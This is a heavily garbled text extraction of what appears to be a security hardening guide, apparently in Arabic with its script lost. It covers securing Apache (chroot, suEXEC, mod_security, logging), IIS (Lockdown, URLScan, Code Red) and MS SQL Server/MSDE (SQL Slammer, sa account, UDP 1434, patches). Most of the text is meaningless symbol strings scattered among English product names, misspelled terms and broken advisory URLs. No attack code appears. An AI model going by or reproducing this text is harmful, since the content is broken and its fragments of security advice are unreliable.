\ 2
B'
R4 S @ 2 0,<
0,6
MULTIVIEW
'
?
B -
, P
-
) X
g
B'0,
- N`6
, P$, <
V4
?)
2 O) ? , 6 G
5
#
"
H) 6
2 \' 21
)
0 < - 3•
B' 6)$
?
1
0,<
?P 4 * $ 5 ,H
R 4 S @0,<
<
F)
@ ?)
6
% H
6
)
B)
,
,,
h / 6-
MOD_AUTH_*SQL j P(
<) STUTTGART- N
?)
_¤]
7
,
2
P
10, <
0
iX
SQL
-" F ?
" RUS-CERT,2001
1
)„
4
2 56)
<
6" / ?@ 2
0
-
6 3 ;. %LY
@
6" / N N
R N F O)
,
"
9
-, @
3
\X
MOD_AUTH_*SQL
• ("c
P
10,
")
0,
,
APACHE ,
R4 S @ d *
- . W L3
a
- Y
! ". /0(123&
("c 7 !89 S
)
6h @ " ?
$
"
6 @
I5
4@ O) -, 6
APACHE 1.3.X
h @" ?
1
2 " U4
+$
U)
@
MOD_AUTH_*SQL
- Y
", - - )
SQL
P<
•
:
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13
h @" ?
APACHE 2.0.X
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20
)
R4 S @ d *
" - Y
0,
<P
0
,Y
- .
I 5 ("c
'7 !89
G X) Z
W
K
a
6h @
("c 7
4
& HTTP://HTTPD.APACHE.ORG/a h @
"2
APACHE O) -, 6 U )
0
L3
$-,< - <
"7
K
4$
"7
"
4@ O) -, 6 U )
4$
DY/ B
<)
DY/ I 5
4@ O) 2 3@ SL " ? 59…w
HTTP://HTTPD.APACHE.ORG/h @ " ?
5 - Y levels PATCH) 6 *
h @" ?
4@
:
GX) 2 3@ "
2
6@
Q CODE SOURCE
6*
…
I5
I
…
0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/
? @ " +F ? !
.
I
4@
% !
) X
- <
R4 S @ ^
1
)„ C'
# 2
"
$
.
-
"2
% 5
0, 5
6-"
$ -, 6 U )
O F$
4
0
? G
“/“
- Y
G',
% '
5 -,6
6
c
H,
), . $ l '
(
:
?@
), .
-)8!0
0, @
#
0 5
?@
'#
,6 *
6U )
H CHROOT/HTTPD|
0
LOGIN SESSION
"
5 )
?# $, 5 " g@
3
6- Y Z
6- Y
#
6 '
) -, < -,
F
W L3
$l '
3
6j*
G',
c
2#5 $
) -,< -, 3 'SHELL
",
8Q0,
C
L
3 'SHELL
15 / - Y Z
E /CHROOT
1G') Z F CHROOTED 7
S
2#5 $
$
,
6
F W L3
4@
F) CHROOT " z 3 ) % !
15 /
F
3
<
4@ -, 6 U )
F CHROOT b .
8Q0
C
)
F & 7
I
)
G ; ! CHROOT
CHROOT0
5<
l '-)
B 4$ CHROOT…‹
,E =
,4
2
W 3 ^ P>
F
) ROOT
? G,
F " …s
E " E %H ,/ W 3 6)
- ),. ,E = G ;!
)
#B
5!
4@
0 < ,6 *
/ 0
- Y
- 5 - Y _CA-2002-23] OPENSSL
) ,
) X
4@
2
5 MOD_SSL(CA-2002-27) (
%
I 2,
F
("c :
("c0,
0
)
!PATCHING " ? 59…p
,B
F
S
4@
2, 0 < ,6 *
5 ? G0
5 ? G0
H CHROOT
E
E
15 /
/BIN/SKY
4@ CHROOTING
)
!89
, "
?@
I5
<&
$ CGI,PHP
6
6U)
,G
+P
-
^ P
6 A) 0,<
< TP,
&'(
7,
3
?@
#
P )
"E
6 ,'
1G'\
6%
6
•c
4) 6
S
, ?# $ S
!89
,
)
BH$
@
R3
4@ -, 6 U )
0
'#< ) [
6 '$ -, 6 U )
< $
, 5
'
K LOGGING
0, 5
(E
2, 0 <
I 5 …Š
) -, 6 U )
("c 2
40
6% '
+
K W L3
?#
" W 3 I
) 1
)„
F) CHROOTING
<
B
K
LOGGING 7 B
5!
g
*
("c 7 , 5 ? @ &1
R 4 M :G
H
9P
("c$ O) -, 6 U )
2#5
F %K W L3
I
6 #6
-, 6 U )
W L3
c
("c
P F7 [ ,
b.
F 3
- Y $ 9
1G'W L3
("c 0, 5
B
:
I 5 O) -, 6 U )
? G$ I
)
# 2
:
6% '
7 L
g
'
)
F 7 !89
a,< ,6 3 6 '? @
a 5 - Y
"+
" ,
•c 7) Y
h @ " APACHE
6
'
)
<@
I5
1.3.X
…
< HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML
APACHE
HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X
- Y
0 <
•c
P
) F
6% '
.
2#5 -, @ j 4 ^ <
) CGI,PHP "
6 „ 1#
&1@ ? j &' I 5 ?
•c0 5 POST,GET
^
MOD_SECURITY n 9 " ,
6•c
F
#
)
)
)Y
l ' GX)0,<P '
,, $
- Y
#
P
[ ( ,H $
=GX
" - Y Z
POST ) GET
bP
7 B
5! ? 5
0
R4 7
_DETECTIOMN INTRUDER] 2 5/& d *
l'
0, 5
N 4
K
F
O)
S
W L3
j< 4
" $MODSECURITY0, 5
U)
MODSECURITY
)
("c
6
<
6 'O)
N 4 ) ,<
O) -, 6 U )
6
^P
- 56
F
0, 5
5/
"
4@ -, 6
-HTTP://WWW.MODSECURITY.ORG/
•-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12
6
) SSI,CGI,PHP…•
#
a
,F
) X #
N ], K5 TG' g
4
#
I
,!
T G' g
2
<
F) ? @
:
SERVER SIDE INCLUDES
",
3
:
) SSI,CGI,PHP…
6? "
_,<
Z
"
6,
F ;! ) ,
6 '-, 6 U )
SSI…
" - Y
0, K5
) SSI,CGI,PHP "
#
6? "
#
F ? # $SUEXEC0 < - Y SUEXEC "
6 ' APACHE USER ID
H
^
, 5
6 '
USER ID
, 6 3 MR /$ ? 5F
7
7, , S
b
, < ("c j
SETUPID ROOT
,
4@ .
. CGI)SSI
L 3 CGI)SSI
) 6 @
3 <) S
SUEXEC " - Y )
/ 0, 5
6
F
3 '
6
F)
, # 4 (,!
#B
5! - .
)
6- Y/ ")
<@
- Y
;!
I ) :
a 5 - Y
a <
- Y
6
SUEXEC " -,Y 0, <
(
0,< ,6 3 N
h @" ?
- Y
2 , 0, < O ) -, 6 U )
-, < <
P
- 5
?# 2 SUEXEC
4@ ?
…
$
USER ID
%
P 7) Y USER ID
2 < ? # ) j6
) X #
" h @ " APACHE 1.3.X
3
2
"
6
…
HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML
a <
" h @ " APACHE 2.0.X
- Y
…
HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML
) CGI-BIN
% <
,
MR/$
5 e 'j 4
6
. W L3
#
5
("c
…
("c ) ( E 6
#
PHP "
) -
z 3 1 2
B / " S1:
a
0
HTTP HEADER
F
- < W L3 2
7 !89 K ;!
SAFE 1/
h @ " ?
W
l '\ X
L3 2
23
5 )
K6
PHP
25
4
C
'
4 ? 5 TG' g…
F " ? 59 T L/…
B5# 7
!89
'
HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706
T)„
8Q 0
G X)
XSS:CROSS SITE
" ?
W L3 2
P
%
I
'X
)
…
MOD_SECURITY
DY/ ; ! ,
B5# 7 !89 -,6
1
)„ " - Y
0 < SCRIPTING
<@
0 5 - Y HTTP://MODSECURITY.ORG/ h @
SQL INJECTION &XSS % < R 4 S @ ^
( 0 5 - Y
h @
2 P
h
,G
6
6 & " ?
:
) &5 …
0
56 &K/ &
H]NIKTO &
%
"
2
#
'
# _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML
0
CGI
) j 4
6&
R
Y
9f
!"
1
23 4 0
&'(
7 !89 "
0
25
?#
A
5L M 9
N M 9" ) , < % !
) !
$ @)
F 7, ,
6
&1@ )
(E $ F
: ),
6
-
% !
"
/)
56% !
-")
) 'D
? ,
, - .
6;. " -
56 $
) 5B
!C
8
%K
&' * +
:
-,< =! > ?@
J
)
# $% !
GH )
5 2'
O*
! 5E 2 '
I
I
H? "
?@
P 4)
,N
0
,G
R4 S @
3W 3 P
B
9
2
F) % 1 $
' ?5F
' 785/
0
T) , % !
) - 5 - Y $-,< 3 <
, * $ 3 M, 6
" 6
%
(
$O * 7
2 5
"
^
L )
?5F
6 @ 0, 5
" - Y
H7
E )
F 78#
2 5
=GX
F) B
! $ R4 S @ ^
R4 S @ d *
? &560
"
6&
$? 5F
) 6- Y/]
Code Red )
$7 !89
:
6A) "
$\
R N6 2
$% !
3
0,
F %K
? @ > GP
8 $
Ba I K6
6
?
" V,
I 5 ,G
* $M,6? G
) X
)? "
R4 S @ ^
K
0, 5
#P
<
"), )
- .)
& 5
Q
6U )
) [
3 _ R4 S @ ^
N &1@ ) K < 0
c
-
) 6? "
N` 6?), ) - # M 9
6
=GX - Y Z
I
,
) 6(
R4 S @ ^
<
b
R4S @
I 5 -, < 2 ),
5B
! 7,
0, <
S
0,< ,6 3 K
c
! 5E
6 'G " U4 $
2
0 3
% !
6
$
N 4
) B
6A) $, , e G
$ R4 S @ ^
"
6%
DY/
4 63
R4 S @ ^
2 5
$_ 1 f 4] "), )
0 3
R4 S @ ^
F) " [
&1 @ ) K < 0 )@
h <
6 A"
? "
,
)
"
? ,
0
=GX
-
"
)
6 S
"
6
! 5E
1) U#
- <
F
4 ) A8 % L/ $% !
7c
9 $U
785/ ) 7 , , SB
g $,
- <?@
R4 S @ ^
,F 7c
6 '? 5F
#P< )
0
4 63
bP
56
% !
6
? F i:
R4 S @ ^
-, " )
0, 6 ( E
("c 7 ,H ) <@ ? @
% !
6
F
-
K6
F
-)
-")
-
F
0, 5
"), )
-
3
I 5 ("c
6%5G1
% <)
bP
B5# ) , Y 7 !89
K6
? F
25F
b
f
% !
6
, G 785/ ?
- Y % !
R4 S @ ^
!
R4 S @ ^
! "#
i:
6
? G _7) Y
2 5
?
"
0
4
1
$
# "), )
- Y
G )
6 * ] "), ) "
$-,< ( E -
)\
a 5
• Internet Information Serveces (IIS)
• Microsoft SQL Server (MSSQL)
• Windows Authentication
• Internet Explorer (IE)
• Windows Remote Access Services
• Microft Data Access Componenets (MDAC)
• Windows Scripting Host (WSH)
• Microsoft Outlook Outlook Express
• Windows Peer to peer File Sharing (P2P)
• Simple Nerwork Management Protocol (SNMP)
785/
-,5!
] MSSQL ) IIS
6 3 $_) )
$ 1 2 T) j *
0 3
4
! " % &# '
Internet Information Services (IIS)
3
IIS
R 4 S @ $e 'j 4 , # 4 ) 7 5 I
a, 5 6 '
" 7, ,
",
) -,
_
3]
G
0, 5
I K6-, "
4 j 4 0, 5
N ISAPI
7 B
5! ( E
- Y $O)
Y 6ISAPI
6 B'" $IIS 0, 5
,F ) W 3 7 B
5! (&B $ISAPI
_SL ]
IIS SL ? "
)
Code Red, Code red 0, <
P 4
F
- Y 0, <
- Y
V < ) Server Side (SSI) Includes $Server
Pk
) - PSL
3 M ,6
4 " IIS
K6% '^ P ) N P56 I 5 _ <
bP
0,
23 , - 9*5 •
%
K6% '] ISAPI -,< 3 < %
ISAPI " PHP ) Coldfusion
Active
ZF•
37
-, 6 U )
W 3
,G
) 6% '23 , - 9*5 ) j 5 •
h / 6-
DLL O G
7P
[
? 5 TG' g •
_DOS] b)
6 B'? @
SL
? 5F
l '=GX "
b
" ,G
) e 'j 4 7 L C
85!
- Y Z
,<
6 B'"
O *
% H $l ' 6 B' Q
6
"
K6
5
0, - 5 - Y
5
l ' 6
/ 9
H F
,1 )
" ) -,6
,
6
P! &
I & IIS
% < $O) ? , 6 U )
0, -, < / 9 $O) -, 6 U )
B
5! b .
? # IIS - 5
< K
I h / 7 !89
7P
[
I5
%K ? 5 m.1 ? @
#B
5!
6
K
5 "
) - "
3
0
) - *1
0, 5
6'
'N
6% '
N " $ 1
) SL " U 4 IIS S
ntdll. Dll Web
R4 S @ ^
) 6 ' _U )
? 5 T G' g] Dos \
U)
)
8Q 0 )@
C
3 I
H ? 5F
$ F
6 ) nH
6
3 ], <
6 ' ? 5F
F
"
" 785/ ? # IIS5.0
#
R4 S @ ^
, N ) ( N (, !
F) E
F
H
?5F
) N
-, 6 U )
)
DAV
0,
-, 6
3 - *1 7
F
0_URL
SL IIS )
7 ) X
, ,F R 4 S @ ^
=GX
o
F)
F
")
) i.
)
K6%
, # 4 (,! % 1
, ,
& IIS
], 5
4)7 #
& PHP, Coldfusion
",
$ R4 S @ ^
,<
0_ N T L.
-, < SL T L.
T L.
T#< )
"
6=GX ) 78#
- Y IIS 5.1 *
0, 5
- Y IIS 6.0 "
pqqs "), ) )
G:H 785/ %
IIS
K
,
# )
-,
7,
) ' ) #
I5 ?
:
0 5 - Y
2 ) % <
' ) #
2
< IIS
1t
#
S L ?@ )
#P< )
^
? , 0
3
0, 5 ( N IIS S
" IIS
0, 5
! ". /0(123&
6 & 2 , ,F
&
:
K A & ?
L IIS
R 4 S @ $, < -,
, N $S L
XP"), ) •
l ' R4 S @ :
) e 'j 4 7
l '
pqqq "), ) •
Professional *
"
+
) SL
NT 4.0 "), ) •
-, 6 U )
0
6Patch
+,
- Y IIS 4.0 "
- Y q$r IIS "
0, 5
I ] 0,
N 0, 5 6 '
- $() *
0, 5
6h @
,
bP
Baseline Securiy Microsoft Analvzer
,6 3
$,
-, !
:
-,<
7,
0
4
GX)
I 5 ?@ " ) '
,G
!89 +
K
3j
$
F
-,< -
IIS
GX)
("c
') #
#B
5!
0
bP ) S
b
R4 S @ ^
. " $ 'S
+H ) , Y
Cheklists a I -,< K
,
"2
<" @ 7 ,
6, @ '? 5 TP
,
" - Y
$ B
/
, ,F =GX ^
=< 7" 5 0
Auto Update , windows Update 0
0
6Patch 2 3@
-,< K
,6 *
6Patch
6
h @" ?
'
IIS "
) - "
l
6? ,
X !
) - @ T L. 6
Update ? #
_ ' ) #
1
)
) X
^
Patch "
I5 S
K6 &
) B
.
)j 4
("c 5
- Y % H l ' & 0, 5
' &
*
I
2
3@ 0,
-,< K Patch 2 3@
)
b
6
K
XP
<
" #
- Y IIS - 56 PHP
("c 0
5 SL
IIS
-, < 'X
6
:
Patch % < $ ' ) #
' ) #
(N
K
http://www.microsft.com/technet/security/tools.hfnetchk.asp
) Perliis, CouldDusion
"
'
!
"), ) ) pqqq "), ) NT 4.0 "), ) )
0
6Patch
Checker Network Security Hotfix (HFNetchk)
? ,
F
456 123&
5 ( N $-, < K
- Y
F
# O B
:
-18 9 Patch # 7"! &
1
)
Patching 0
-, < S L -, 6 U )
)
) ( N6
K6A) "
! " %&
IIS
DY/ 6
$ #P< ? , 0, @ %5G - Y IIS
" - Y
i: Z
IIS
,<
-, < ( E
-,< K
6
<
"
(N
P ) GF
l '7c L.
6
F
6U )
) Windows
-, < 'X 7c L.
g] -,< 'X 7c L.
"
( N6
bP
? ,
0, 6 ( E
- (#=% ! & 2>
Lockdown IIS :; < &
? @
) ("c
6
("c ) - P
3
15
IIS
IIS
&)
IIS SL
K
h @" ?
0 5
F
25
I
*
0
-
&
<
') #
Lockdown
-,
. com/technet/security/tools/locktool.asphttp://www.microsoft
'
3 I
SL
"
7
:
Expert
u?
"7
u?# S
) Custom 1/
l'
F
IIS SL
2, 0 5 d *
^P
6 'IIS
a
?@
F)
5< I
N ] WebDAV ? 5 TG' g •
b. #
_,<
Printer, ism. a I ]
) X
g
< "
$O)
.
6ISAPI extensions ? 5 TG' g •
_Idq, htr
IIS - 56 -,< K
b
C 5!
T) ,
5
7
-
3 ) Code Blue
HTTP
0, <
6, "
?
URLScan
? @ A"
4 " % PH K6
) cmd.exe
27 ? 2 & @ 2>
I IIS
R4 S @ ^
6
3
I]
1
) K LLS Lockdown.
.
15
bP 785/ "
7 L
*
2 ` A R4 (,! ;!
&) - 5 l '
"
,G
6, " Code Red
85/] , 5
5
- Y
, #4
0, < -, 6 U )
http://www.microsoft ah @ "
0
- Y ?5F
URLSean
B'0_Buffer Ovrflow \ "
3
+ •
Z&F " O) -, 6 U )
0_tftp.
-HTTP + ,
5 MR/ •
6
N
b
?@ ?
' & com/technet/security/tools/locktool.asp
R4 S @ : 2 )
Microsoft SQL Server (MSSQL)
_MSSQL] ' ) #
, F R 4 S @ : 2,
- 9 *5 )
!89
3
0, 5
7
.
6 ' ? 5F
2#5 & -, 6 U )
3 M, 6
F
/ 7 !89
i.
R4 S @ ^
-, < =
'
?#
SQL ? , 6 U )
b
? &
MSSQL
( 5! W 3 F
- Y
u $h
SQL -, 6 U )
,
7 / 23 ,
# 4 (, ! % 1
, )W 3
0,
HS @), , e
6=GX "
!
?@)-
G
?5F
SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida (
) 0, 5
) - Y MSSQL -, < 3 < =GX ^
3 ?1
( E l ' R4 S @ :
2'
,
F
F E F)
Tu<] ,
6(
:
-
" _pqqs ) pqqp T ]
-
785/ 6
1
@A
I
0_T
"
-,< TG'] SQLSnade/ Spida (
b. ,
6h @ ) +
:
,
- 1
@ ? & 0, 6
#P
< ' $ R4 S @
'
a 5 - Y
aMay 2002]
l ' 6(
j &' Kc ,/
B5# 7 !89
? " 7,
6
4"
" ?
K
c
$l '
B5# 7 !89
•
http: //isc. Incidents. Org/ ang lysis. Html? Id= 157
•
http: //www.eeye. com/ html/ Research/ Advisories/
AL20020522. Html.
•
http: //www.cert. org/ incident- notes/IN-2002-04. Html.
T G'] SQL-Slammer/SQL-Hell/Sapphire (
:
B5# 7 !89
aJanuary 2003 v
•
http: //isc. Incidents. Org/ analysis. Html? =157
•
http: //www.nextgenss. com/ advisories/ mssql-udp. Txt
•
http:
//www.eeye.
AL20030125. Html
com/
html/
Research/flash/
-,<
•
http: //www.cert. org/advisories/ CA-2003-04. Html
) wxss
4 Internet Storm Center b
67
K67 4 B
5F " _MSSQL -, 6 U )
,<
0
, #4
" ? 59 T L/
0,
2
0
I5
F
DY/
,
( , H ? @ ? 5 T G' g
sa Account
" ?
6
"
) h, /
-
P
6) ( E
:
" %#
T
0, 5
"
#
6
2<
)
U)
) 6
$l '(
%
N 4$
gatway
\ ' A) 2
#
N
7
UDP
^
0_-,< - < 7 4
'
L
/] , < %#
H
wxsx 7
bP
#4
4y
!89
F
3
H, , e G
)
I
Z F MSDE ? @
)
\X
!89
? ,6
Patching
6j 4 7 L
z) 3 ) ) ) -" F]
_ SQL -, 6 U )
6
F SQL
bP
MSDE 2000, Microsoft Server 2000 Deskrop Engine
,G 0 '
!89
1
@),, e G
("c 7 ,H 5
B')
6
#B
5!
5
l ' GH ) h
0 ' ,6 3
,
-, < K 7 ,
3& @,,
0
[
I5
) -,< N
wxsx 7 4
5 0, 5
'
Resolution Service
Overflow Stack Buffer \ 2
), <
?
SQL Slammer (
2
6
&
3 account
?@ "
h
"?&
R4 S @ ,L
K6U )
I
SF l 'Buffer Overflow 0
( ,H (
" :
Sa Account 0 5
P
!&
Buffer Overflow
_% 5/] A
bP
B5# 7 !89
- . _0 < 5 - Y SQL/MSDE Z F
SQL Server
..
0 < 5 - Y
I
-, ` 4
P
!&
account
^
K7 L
#B
5! - .
Null
_,<
- Y Chang the SQL Sevr Admininistror Login h @
?@ d *
b
SQLSnake (
N
, )
67 4] wxsx
25F
, account
("c :
" #
e 'j 4
H _ '#< - N]
sa account] e 'j 4
0
-, < K A & h
#P
< 6
#B
5!
"] SQL Lite Server ? G ?
2
P
/
?P
/
"
"
-, < S L Server SQL " *
) 6 @, <
)
7c L. - 56
Z&F "
? @)
# ? G MSDE 2000 0, ,
P
a
•
*<
SL
"
SQL/ MSDE Server 2000 (Developer, Sradard and
Enterprise Editions)
•
Visral
Studio.
NET
(Architect,
Developer
and
professional Editions)
•
ASP. NET Web Matrix Tool
•
Office XP
•
Access 2002
•
Visral Fox Pro 7.0/8.0
0, 5
,
-Y
, 6 3 SQL/MSDE -, 6 U )
#40
= B*
6A) " - Y
8Q 0 < C
A
" - Y
$? ,
H? ,
_TCP 7
0_
F) & -, < - <
wxsx 7
wxss 7
4
/ 9 -,
-
0,
TL
4
$pqqq MSDE
F
UDP
&1 # ?),
#
Overflow Buffer
^
4
U)
60
? ,
d*
")
GX) $, < , 6 3 ( E UDP h
6
;! $,<
)-
%L
?@
UDP
U)
^
0
$-, 6 U )
-, <
? ,
X02
0,
<
"
* A) " I '
,6 3A
wxsx 7 4 )
!89
K6
$
( 4
#4
NAMED PIPES
)
l '7 4 0
3
l ' ,
6" - Y ? # ] ,
? !
l '7
6
L ?
? ,
#) )
TL - . T
!89 $
( E
4" - Y
pqqqMSDE
!89
56MSDE ) SQL -, 6 U )
y 6567
#
b
& ?@
N?
4] Session NetBIOS
4 xxr|ws{ 7
^
,K
U)
#
R4 S @ ^
( E
U)
TCP
U)
6? G MSDE " l ' 6 &'(
!89
!89
3
:
F) -, 6 U )
\ 2 " 785/ 6, "
#
?@
F
pqqqMSDE
'
6-"
Z F System Local
,L
account
^
,
4 # " I ' ] 0,< ,6 3
) User Domain
$ F
6- Y/ " & @
0,6
,L
Overflow Buffer
)
- Y ,L
, , j6
F
("c 5 $
nH
Critical Update a I ! '
R4 S @
7 K
&F &1 @ ) K <@
' - Y _,
H , , ) - 9* e G
6& " - Y ) '
0 5 ( N6
[
0 5 - Y Incidents.org h @ " ?
- Y $, 5
? @-
6% '7
"), )
Microfoft SQL /MSDE Desktop Engine
"
,F 7
0,< ,6 3
N
:
)
8 (
6& "
h @n
^
+,
6*
"
6
6) , < -, < SL 2000
&'(
HS @),, 2 e G
2
l'
) pqqq SQL/MSDE Server7.0
$, 5
+
K
K
Kit Microsoft SQL
$ SQL/MSDE
56
- Y
- Y $, 5
0, 5
- $() *
SQL/MSDE Server,
F
, # 4 ) Patching " 5
% < 6 #P
< ) Domain ( 5 ?
6
^
" SQL Slammer #
, # 4 ) Patching " 5
nH
3) l ' F
! 5E
- Y MSDE 2000
! ". /0(123&
') #
<
9" ?
http://www.microsoft.com/sql/downloads/securitytools.asp
? @
SQL Critical Update Kit $-,< K Toolkit 0 5 , 4
6 & % < ) -,< -,
& SqlSecurity.com
0
SQL Critical Update ) SQL Scan
!89
-
K
5
$, 6
$l ' & 0
)? &
A
^
UDP1434 7 4
wxsx 7
SQL Pingv2.2 (
4
_X02
SQL ? , 6 U )
& :
2
UDP
, ]
0, 5
I
T
Subnet
) *
- 5< I
SQL Scan Microsoft
0
^P
!89 ) -
l ' &'(
#B
5! 0, 5
TP
("c v 4 ?@
(8!
! " %&
"7 B
5! $l ' R4 S @ : %
9
456 123&
6
DY/ I
a K5
GDEFE UDP C 2A SQL/MSDE Monitor Service ? 2A& A
* AB •
-, < K
6
S @ : )
BH " - Y ) SL
MSDE 2000
?), ) ) - " ) - Y
UDP n 9 " F
User
& @
b
) %L
6
O*
'L 7
T
( ,H $
)-
#P<
#P< )
6-"
1
@ " U4 F
SB #P
< )
^
account
2#5
F
&1
e G
O*
'L 7
R4
N`6
0 <; !
) Domain
6- Y/ "
0,6
UDP 1434 7 4
,L
0, 5
6
0, 5
T
s}~
IP
!89
6h @ 0
? 5 TG' g ] Dos \ " F
_U )
7 B
5!
MSDE SQL/MSDE 1 , I
SQL/MSDE -, 6 U )
F
4 # " I'
' $l '(
' " MB/Sec - E 4 " j - 1
@ 2<
0
,K
3 I
F
I
Ms-SQL/MSDE Slammer (
!89
Multicast \ " $,
n . $W ,
$
,L
s}~ % <
, 6 3 j &'
-, 6 U )
FSystem Local
' - Y $,
3(E
Buffer Overflow
,
MSDE2000
H , , ) - 9* e G
$
$l '
0 5 SQL Pack 3a Server 2000 - 56
F
'
n 9"
( ,H ?
( E ?# C
85! ) W L 3
+
:
$-,< P
[ 7< & h
0,< ,6 3
3
#P
<
Pack Service # 7"+ H ; •
Pack Service
6*
2 3@ G2000
a" ,
SQL/MSDE Server 7.0 Service Pack 4
Pack 3a MSDE/SQL Server 2000 Service
P
!
G Pack Service # A
7" I A1A
8 9 Patch # 7"+ H ;
U)
6*
b
5
-, < K
6Patch 2 3@ "
-,< K
- Y
"
6h @ " ?
I
SQL/MSDE/MSDE -, 6
21 " ?
F Patch 2 3@ SL " ? 59
a
6@
I
0 5 - Y
') #
SQL/MSDE -, 6 U )
:
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
9
<+ &H J K 7 + ,Patch + H ; •
Patch # 7" I
L2
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 G A
&1A
8
Patch ?
$ Web MS02-061
I
0
-,
a 5 - Y
K
"
"2
9
-,< K Patch 2 3@ "
6h @ " ?
6 @ ) ? 59
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
I
GPack Service # A
7" I A1A
8 A
9 Patch # A
7"+ H A
; •
-, 6 U )
6*
- Y
b
' ) #
-, 6 U )
5
-, < K
-, < K
6Patch 2 3@ "
21 " ?
SQL/MSDE/MSDE
F Patch 2 3@ S L " ? 59
:
a
- Y
"
6 @
I
0
5
SQL/MSDE
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000 (MSDE 2000) MSDE
Patch # 7" I
A
9 M2
<+ &H J K 7 + ,Patch + H ; •
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 G A
&1A
8
Patch ?
$ Web MS02-061
I
0
-,
K
"2
9
I
0
-,
a 5 - Y
K
"
Patch 2 3@ "
6 @ ) ? 59
-,< K Patch 2 3@ "
6 @ ) ? 59
"2
9
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000( MSDE 2000) MSDE
C 5! l '? # GAuthentication Logging SQL Server ? 2A& A
*•
Enterprise Manager
785/ 2 1
),
_sa” (
"
n 9" ?
# G ;NA
8
A
sa Account #
0
, F, , e G
j *
$, <
-, < K 7
4"
Server Book Online
sa Account
P
!& ?
" - Y
O%A
•
1A, I
A+
3
_blank]
#
$ MSSQL/MSDE
P
!&
SQL/MSDE
-,< DY/ P
!&
("c 0
< , 63
H
Administrator (SA) Login System
2t
5: W L3
("c ? 59
- Y SQL/MSDE
SQL/MSDE -, 6 U )
0_
TG' g
5 ( ,H
2
^
- Y l 'account " 9
K 7,
5
0
_Server Properties Security ]
, account "
-, < 3 <] e 'j 4
^
?@ ? 5 TG' I
R4 7 ) X ("c
/] 0
7 ,H
the SQL Server Administrator Login j *
) ' ) #
%
& $, 5
MSDN
/
5
-, <
and Change the System Administrator Password by Using ) $ Changing
) , #4
I
-,< K
6
) 7 # 2 3@ " ?
MSDE Verify
0 5 - Y $sa Account S
I
MSSQL/MSDE I
A
U)
4 :
Domain
?
2
!
]
Z F^
B
. 7"
) _NT "), )
6 56
A
6 A•
GSQL/MSDE Server Agent 1A,
. $ SQL/MSDE Server Agent ) -, 6 U )
] Local System
)
A AM2A C A ? &A
I
7"
] SYSTEM
S @e G
U)
%H , /
MSSQL/MSDE
account Valid
) administrator domain
0 _XP
) pqqq "), )
0
,6 3
#P< )
%
T
?#
F
Z F Domain
$
a
4
"
:
2
auditing ) Windows NT Authentication ? 5 T G'
U)
$-, < F
7
#<
)& @
MSSQL/MSDEServer
0, K5 T G' ? @ C, E ) = H
"
, 6( E
N
6Login
'
? ,
U)
,
#4$? #
0, 5 - Y Authentication NT
#P< "
g
6- ),.
F) 3 )
: y
B'0
) ) 7c L W L3
R4 7
W 3
TCP/UDP
;! ,
? , 6U)
^ P
P
6
("c
6U )
4"
F 3
67
4"
N 4
( E
bP ) MSSQL
"E
$ SQL/MSDE -, 6 U )
"
67 4 z) 3 ) ) )
)
B
3 ? 5F
G5
SQL/MSDE
4
("c #
B'
0
B'
G5 )
R4 S @ %
y
y
wxss ) wxsx
$, <
wxsx ) wxss
- Y
^
1
@)j
0
^
!89
$
(E
25 "
- Y
TCP/UDP
l ' 67 4 "
6 @
a 5 - Y
I
"
-
Microsoft SQL/ MSDE Server 7.0 Security
-
Microsoft SQL/ MSDE Server 2000 Seurity
6h @ " ?
! " % &# 2
Windows Authentiction
% G
6
6A)
?
6, )
Q0
b
f
-, < -
) 6 '-,< d *
+
" - Y
+
" - Y
DZ
0
N` 6?),
)
" U 4 ? 5F
)
" )-
6%
6account
#
- 5 account
, N ) = G0 <
( #.
" I'
H
?@ =GX
P
!&
u
-)8!
/)
+
,6 3
F)
2
3- Y
R
0,< ? "
H
% !
3\P ? "
+
P!
F) ,
B
5! $
) X
a
P
!&
< ,K
,
75I
€
P
! & ,H ' ) = GX
F
6 1G'( E
6, 4 ,
4"
2 1
), ) 2 5
,6 3
<
6(& # " - Y ] -,< , K ?
+ $
0
-
6
\ ' i: 2 1
) E
-,< 2),
S @^
,K
•c $
P
! & ,H ' ) = GX account
-, < K
:
) -,
,6 3
=
9P
? @"
0
H , F7 , , e G
< TP,
,F , , ,
b
SB
'
!89
F ) -, < = G
U 4 0, <
F
) , K " U4 ? @] 0,<
_0
2
, K " U4 0 < ,6 3 N
1G' #
,
" - Y
)?
6" E ) 7 "
S[ ?@
0, 6
6
1G'$
, -,<
H _7) Y
&
P
P! &
) % ' DY/ I ?
?# ?
P! & 2
P
! & 2'
-
"E
5 $
/
C
5
?@
?@?
6A) $
!89
6&
H -, < -
?@
)
) T) ,
P
!
+
, K
"
P
!&
6& " ?
P
!&
? "
9
P
!
% <&
^P
R4
-,< = G Account •
S
DY/ (, ! •
0-,< = G
, account E ?# $ F
= GX
6 &'(
0, 5
4
5! , B
hashing 5
N1
"
-, < &
) ) ,
\ 2 P
-
F) 2
, 5 ,H
6& " - Y
0
2
), 5
0, 5
P
!& ?
5 T
0 <
X
,K
+
"
S
) ( #.
3 1
)
GP
2
W L3
6& "), )
_hashing
6 *1 E/
F) , K
_
"
Hash ,
[ 19
a
"
N1\
)
6
F
Hash ,
D
"
("c
("c
P
!
I5 $ P
!&
DY/
= G
7 L
,
- 3•
